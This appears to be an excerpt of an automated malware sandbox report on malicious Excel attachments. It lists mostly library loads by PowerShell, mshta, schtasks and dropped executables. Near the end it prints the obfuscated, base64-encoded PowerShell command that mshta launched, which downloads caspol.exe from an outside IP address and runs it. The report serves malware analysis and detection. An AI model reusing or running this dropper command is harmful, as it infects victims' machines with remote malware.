                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: mozglue.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: dbghelp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: msvcp140.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: vcruntime140.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: ucrtbase.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: wkscli.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: samcli.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: samlib.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dll
                    Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drInitial sample: OLE zip file path = xl/calcChain.xml
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drInitial sample: OLE zip file path = docProps/thumbnail.wmf
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                    Source: Payment Advice.xlsStatic file information: File size 1136128 > 1048576
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.pdbhP source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.pdb source: powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.pdbhP source: powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.pdb source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drInitial sample: OLE indicators vbamacros = False
                    Source: Payment Advice.xlsInitial sample: OLE indicators encrypted = True

                    Data Obfuscation

                    barindex
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, a6RnQjwUyOApqVRoTt.cs.Net Code: mDY2StBQj7 System.Reflection.Assembly.Load(byte[])
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgIC